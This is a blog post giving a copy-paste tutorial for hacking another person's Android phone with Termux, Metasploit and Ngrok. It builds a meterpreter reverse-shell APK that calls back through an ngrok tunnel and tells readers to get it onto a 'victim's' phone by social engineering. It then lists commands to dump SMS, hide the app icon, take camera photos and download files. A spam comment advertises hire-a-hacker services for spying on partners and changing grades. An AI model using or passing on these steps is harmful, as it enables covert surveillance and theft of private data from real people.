A blog about Tips and Tricking any thing that possible in social networking and websites or, software, internet, computer, hack, crack, serial...

Sunday, September 4, 2022

Termux with Metasploit and Ngrok Smartphones Hack by Android Smartphone

How to hack android phone using Termux with Metasploit and Ngrok

You can just copy-paste the commands one by one in termux app and it will work perfectly.

Requirements: Termux App

Install Metasploit on termux

Code -
pkg update
pkg upgrade
pkg install ruby
gem install nokogiri
gem install lolcat
gem install jekyll
pkg install unstable-repo
pkg install metasploit


Port Forwarding using Ngrok in termux

Go to Ngrok.com and create an account.
If you already have an account at negrok then log in.
Download the Ngrok zip file on your phone.It will be approx 12Mb file.
Now you will see a zip file that you have downloaded from the Ngrok website. Open termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder , just open file manager and paste the zip file in your internal storage.and go to termux and cd storage.


    cp ngrok-stable-linux-arm.zip /$HOME
Type this command to go back to your home directoty. 
   cd /$HOME  
Type this command to unzip the file. 
   unzip ngrok-stable-linux-arm.zip    

Go to Ngrok site again and copy the token,(please copy the full token)    
Open terminal and type this code and paste your token and press enter. 
  ./ngrok authtoken     
Type this command to start port forwarding on port 1275. 
   ./ngrok tcp 1275
You can use any port number i am using 1275 here.   
If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.

Create payload in Metasploit

Thepayload will be an apk file which we are going to install on the victim's phone. That will allow us to Acess the victim's android phone. 
Open a new session in termux (just swipe your screen from left to right and click on new session). please make sure the termux have storage permission.    
  termux-setup-storage Allow storage permission.  
Type this command to create a payload and press Enter.
  Please change your LHOST and LPORT as given in the below image.  

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk 


Go to your internal storage and you will see Android.apk.

Install this apk in the victim's phone by Social engineering Method.

Start Listener (msfconsole)

Type this command in termux window to start the msfconsole.  msfconsole
It can take upto 30 sec to start.   

Typethis command. 
use exploit/multi/handler    
Type this command to set the payload.
set payload android/meterpreter/reverse_tcp   
Now set the LHOST at which you wanna listen to the session. If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP. 
set LHOST 127.0.0.1    
Now set the LPORT. if you are using Ngrok then set the same port which you used while port forwarding. if you are not using port forwarding then just enter the same port you used to create the payload. 
set LPORT 1275    
This is the last command and the phone will be Hacked. 
exploit
It will connect to the victim and give you meterpreter session.

 Some useful commands in Meterpreter.

Find all the commands available: this command will give you a list of commands and a short description of that command. 
help     
Get SMS from victim's phone to your phone: This command will give you the most recent 50 SMS from the victim,'s phone. 
dump_sms

You will get a text file that contains all the SMS with details just use cat command to open the file.    
Hide the icon of the Apk you send to the victim: If you are installing an app on the victim's phones then it obvious that the victim gonna notice that app and chances are the victim will uninstall the app.by using the below command you can hide the app icon from the victim's phone. 
hide_app_icon  
Change the audio mode of the victim's phone: you can set the phone on the general mode by using the below command.
  set_audio_mode -m 1
You can type
set_audio_mode -m 0
to silent the phone.  
Capture pictures from the victim's phone: This command will capture a photo from the victim's camera and send it to your storage folder. 
webcam_snap   
Access file storage of the victims: You can navigate to the victim's file and see all the data in any folder.
cd /sdcard
you can type' ls 'command to show directories if you wanna know about the basic commands of termux read this post.  
Download any file from the victim's phone: navigate to the file you wanna download and type this command 
download file-name
Hope you enjoy.
So now you have a meterpreter session that means you have access to the victim's phone. but if the victim deleted the app then you can't access the phone again, If you want to know how we can access the phone even if the victim restarts the phone then check out ...
READ:  How to Hide App icon from the victim's phone and Stay connected even After Victim restarts the phone.












By -
Labels: , , , ,

1 comment:

  1. jane hollySunday, December 13, 2020 at 4:37:00 PM GMT+5:30

    CONTACT: onlineghosthacker247 @gmail. com
    -Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
    -Let them Help You Hack Any Website Or Database
    -Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
    -Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
    -And All Related Services
    - let them help you in recovery any lost fund scam from you
    onlineghosthacker Will Get The Job Done For You
    onlineghosthacker247 @gmail. com
    TESTED AND TRUSTED!

    ReplyDelete

Subscribe to: Post Comments (Atom)